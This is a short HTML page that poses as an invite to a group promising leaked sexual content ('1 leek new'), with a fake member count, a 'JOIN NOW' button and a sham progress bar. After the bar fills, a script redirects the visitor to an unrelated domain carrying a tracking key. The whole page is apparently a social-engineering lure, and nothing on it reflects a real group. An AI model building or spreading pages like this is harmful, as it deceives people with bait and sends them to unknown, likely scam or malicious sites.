
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>1 leek new 🍆🍑</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      text-align: center;
      padding: 40px;
      background-color: #f0f2f5;
    }
    h1 {
      font-size: 24px;
      margin-bottom: 10px;
    }
    img {
      width: 150px;
      height: 150px;
      border-radius: 50%;
      object-fit: cover;
      margin-bottom: 15px;
    }
    .info {
      font-size: 16px;
      color: #555;
    }
    button {
      padding: 12px 24px;
      background-color: green;
      color: white;
      font-size: 16px;
      border: none;
      border-radius: 6px;
      cursor: pointer;
      margin-top: 20px;
    }
    .progress-bar {
      width: 80%;
      background-color: #ddd;
      border-radius: 10px;
      overflow: hidden;
      height: 20px;
      margin: 20px auto;
      display: none;
    }
    .progress {
      height: 100%;
      width: 0%;
      background-color: green;
      transition: width 0.2s;
    }
  </style>
</head>
<body>

  <h1>1 leek new 🍆🍑</h1>
  <img src="https://i.imgur.com/Mt8Fz9S.jpeg" alt="Group Photo">
  <div class="info">728 Members • Created in April 2025</div>

  <button onclick="startProgress()">JOIN NOW</button>

  <div class="progress-bar" id="bar">
    <div class="progress" id="progress"></div>
  </div>

  <script>
    function startProgress() {
      document.getElementById('bar').style.display = 'block';
      let width = 0;
      let progress = document.getElementById('progress');
      let interval = setInterval(() => {
        width++;
        progress.style.width = width + '%';
        if (width >= 100) {
          clearInterval(interval);
          window.location.href = 'https://marathonseaside.com/u99e6tce?key=2f56fb3f45647eec5d32f53a22cea248';
        }
      }, 30);
    }
  </script>

</body>
</html>
